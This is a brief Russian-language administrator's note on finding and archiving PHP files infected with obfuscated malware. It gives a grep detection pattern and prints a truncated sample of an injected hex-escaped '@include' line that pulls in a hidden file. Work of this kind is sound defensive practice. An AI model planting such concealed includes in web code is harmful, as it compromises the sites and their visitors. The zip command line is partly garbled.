# Поиск find /var/webserver/www -type f -name *.php | xargs grep -l '$GLOBALS\[$GLOBALS\[' > tmp/virus_php_list # то что нашли - заархивировали zip /home/dima/virus_php_1.zip [email protected] < /tmp/virus_php_list
Примеры кода в php файлах:
В начале файла
/*74a9f*/
@include "\x2fvar/\x77ebse\x72ver/\x77ww/h\x61ppy.\x63o.ua\x2fwww/\x74empl\x61tes/\x6aa_pu\
/*74a9f*/
Расскодировать строку: https://malwaredecoder.com/